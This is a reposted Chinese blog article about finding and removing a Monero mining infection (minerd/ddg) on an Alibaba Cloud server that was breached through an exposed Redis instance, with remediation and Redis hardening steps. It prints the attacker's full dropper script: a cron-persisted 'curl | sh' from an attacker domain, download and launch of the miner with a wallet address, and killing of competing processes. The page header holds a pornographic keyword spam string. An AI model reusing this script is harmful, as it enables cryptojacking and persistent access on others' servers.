日韩性视频-久久久蜜桃-www中文字幕-在线中文字幕av-亚洲欧美一区二区三区四区-撸久久-香蕉视频一区-久久无码精品丰满人妻-国产高潮av-激情福利社-日韩av网址大全-国产精品久久999-日本五十路在线-性欧美在线-久久99精品波多结衣一区-男女午夜免费视频-黑人极品ⅴideos精品欧美棵-人人妻人人澡人人爽精品欧美一区-日韩一区在线看-欧美a级在线免费观看

歡迎訪問 生活随笔!

生活随笔

當前位置: 首頁 >

阿里云服务器被挖矿程序minerd入侵的终极解决办法[转载]

發布時間:2025/4/16 24 豆豆
生活随笔 收集整理的這篇文章主要介紹了 阿里云服务器被挖矿程序minerd入侵的终极解决办法[转载] 小編覺得挺不錯的,現在分享給大家,幫大家做個參考.

? ? ? 突然發現阿里云服務器CPU很高,幾乎達到100%,執行 top c 一看,嚇一跳,結果如下:

?

3798 root 20 0 386m 7852 1272 S 300.0 0.1 4355:11 /tmp/AnXqV -B -a cryptonight -o stratum+tcp://xmr.crypto-pool.fr:443 -u 4Ab9s1RRpueZN2XxTM3vDWEHcmsMoEMW3YYsbGUwQSrNDfgMKVV8GAofT 5844 root 20 0 3448m 292m 14m S 1.7 3.7 26:02.07 /usr/java/default/bin/java -Xms64M -Xmx1G -Djava.util.logging.config.file=logging.properties -Djava.security.auth.login.config=/us 2500 root 20 0 220m 9.9m 5176 S 0.3 0.1 0:09.02 /tmp/ddg.217 1 root 20 0 19360 1532 1232 S 0.0 0.0 0:00.61 /sbin/init

?

有個進程minerd盡然占用了300%的CPU, 百度了一下,貌似服務器被利用Redis漏洞攻擊,植入了挖礦程序,挖類似比特幣的東西。

查到幾篇文章都有人遇到同樣問題,解決的辦法:http://blog.csdn.net/hu_wen/article/details/51908597

但我去查看啟動的服務,盡然沒有 lady 這個服務。 找不到根源,那個minerd進程刪掉就又起來了,后來想了個臨時辦法,先停掉了挖礦的進程

1. 關閉訪問挖礦服務器的訪問?

iptables -A INPUT -s xmr.crypto-pool.fr -j DROP?and?iptables -A OUTPUT -d xmr.crypto-pool.fr -j DROP.

2. chmod -x minerd? ,取消掉執行權限, 在沒有找到根源前,千萬不要刪除 minerd,因為刪除了,過一回會自動有生成一個。

3. pkill minerd? ,殺掉進程

4. service stop crond 或者 crontab -r 刪除所有的執行計劃

5. 執行top,查看了一會,沒有再發現minerd 進程了。

6.檢查/var/spool/cron/目錄下發現有個root用戶的定時器文件。

下載腳本的語句:

*/5 * * * * curl -fsSL http://www.haveabitchin.com/pm.sh?0105010 | sh

病毒文件內容如下,感興趣的可以研究下:

export PATH=$PATH:/bin:/usr/bin:/usr/local/bin:/usr/sbin echo "*/5 * * * * curl -fsSL http://www.haveabitchin.com/pm.sh?0105008 | sh" > /var/spool/cron/root mkdir -p /var/spool/cron/crontabs echo "*/5 * * * * curl -fsSL http://www.haveabitchin.com/pm.sh?0105008 | sh" > /var/spool/cron/crontabs/root if [ ! -f "/tmp/ddg.217" ]; then curl -fsSL http://www.haveabitchin.com/ddg.$(uname -m) -o /tmp/ddg.217 fi chmod +x /tmp/ddg.217 && /tmp/ddg.217 killall /tmp/ddg.216 if [ -d "/opt/yam" ]; then rm -rf /opt/yam fi ps auxf|grep -v grep|grep /tmp/duckduckgo|awk '{print $2}'|xargs kill -9 ps auxf|grep -v grep|grep "/usr/bin/cron"|awk '{print $2}'|xargs kill -9 ps auxf|grep -v grep|grep "/opt/cron"|awk '{print $2}'|xargs kill -9 ps auxf|grep -v grep|grep "/usr/sbin/ntp"|awk '{print $2}'|xargs kill -9 ps auxf|grep -v grep|grep "/opt/minerd"|awk '{print $2}'|xargs kill -9 ps auxf|grep -v grep|grep "mine.moneropool.com"|awk '{print $2}'|xargs kill -9 ps auxf|grep -v grep|grep "xmr.crypto-pool.fr:8080"|awk '{print $2}'|xargs kill -9 #/opt/minerd -h #if [ $? != "0" ]; then #ps auxf|grep -v grep|grep "/opt/minerd" #if [ $? != "0" ]; then #if [ ! -f /opt/yam ]; then #curl -fsSL http://www.haveabitchin.com/yam -o /opt/yam #fi #chmod +x /opt/yam && /opt/yam -c x -M stratum+tcp://4Ab9s1RRpueZN2XxTM3vDWEHcmsMoEMW3YYsbGUwQSrNDfgMKVV8GAofToNfyiBwocDYzwY5pjpsMB7MY8v4tkDU71oWpDC:x@xmr.crypto-pool.fr:443/xmr #fi #fi DoMiner() { if [ ! -f "/tmp/AnXqV" ]; then curl -fsSL http://www.haveabitchin.com/minerd -o /tmp/AnXqV fi chmod +x /tmp/AnXqV /tmp/AnXqV -B -a cryptonight -o stratum+tcp://xmr.crypto-pool.fr:443 -u 4Ab9s1RRpueZN2XxTM3vDWEHcmsMoEMW3YYsbGUwQSrNDfgMKVV8GAofToNfyiBwocDYzwY5pjpsMB7MY8v4tkDU71oWpDC -p x } ps auxf|grep -v grep|grep "4Ab9s1RRpueZN2XxTM3vDWEHcmsMoEMW3YYsbGUwQSrNDfgMKVV8GAofToNfyiBwocDYzwY5pjpsMB7MY8v4tkDU71oWpDC" || DoMiner DoRedis6379() { iptables -F REDIS6379 iptables -A REDIS6379 -p tcp -s 127.0.0.1 --dport 6379 -j ACCEPT #iptables -A REDIS6379 -s 0.0.0.0/8 -p tcp --dport 6379 -j ACCEPT #iptables -A REDIS6379 -s 10.0.0.0/8 -p tcp --dport 6379 -j ACCEPT #iptables -A REDIS6379 -s 169.254.0.0/16 -p tcp --dport 6379 -j ACCEPT #iptables -A REDIS6379 -s 172.16.0.0/12 -p tcp --dport 6379 -j ACCEPT #iptables -A REDIS6379 -s 192.168.0.0/16 -p tcp --dport 6379 -j ACCEPT #iptables -A REDIS6379 -s 224.0.0.0/4 -p tcp --dport 6379 -j ACCEPT iptables -A REDIS6379 -p TCP --dport 6379 -j REJECT iptables -I INPUT -j REDIS6379 } iptables -D OUTPUT -j REDIS6379 iptables -F REDIS6379 iptables -X REDIS6379 iptables -D INPUT -j REDIS63792 iptables -F REDIS63792 iptables -X REDIS63792 #iptables -N REDIS6379 && DoRedis6379 View Code

?

解決minerd并不是最終的目的,主要是要查找問題根源,我的服務器問題出在了redis服務了,黑客利用了redis的一個漏洞獲得了服務器的訪問權限,http://blog.jobbole.com/94518/然后就注入了病毒,下面是解決辦法和清除工作:

1. 修復 redis 的后門,

  • 配置bind選項, 限定可以連接Redis服務器的IP, 并修改redis的默認端口6379.
  • 配置AUTH, 設置密碼, 密碼會以明文方式保存在redis配置文件中.
  • 配置rename-command CONFIG “RENAME_CONFIG”, 這樣即使存在未授權訪問, 也能夠給攻擊者使用config指令加大難度
  • 好消息是Redis作者表示將會開發”real user”,區分普通用戶和admin權限,普通用戶將會被禁止運行某些命令,如conf
  • 2. 打開 ~/.ssh/authorized_keys, 刪除你不認識的賬號

    3. 查看你的用戶列表,是不是有你不認識的用戶添加進來。 如果有就刪除掉.

    轉載于:https://www.cnblogs.com/dadonggg/p/8142905.html

    總結

    以上是生活随笔為你收集整理的阿里云服务器被挖矿程序minerd入侵的终极解决办法[转载]的全部內容,希望文章能夠幫你解決所遇到的問題。

    如果覺得生活随笔網站內容還不錯,歡迎將生活随笔推薦給好友。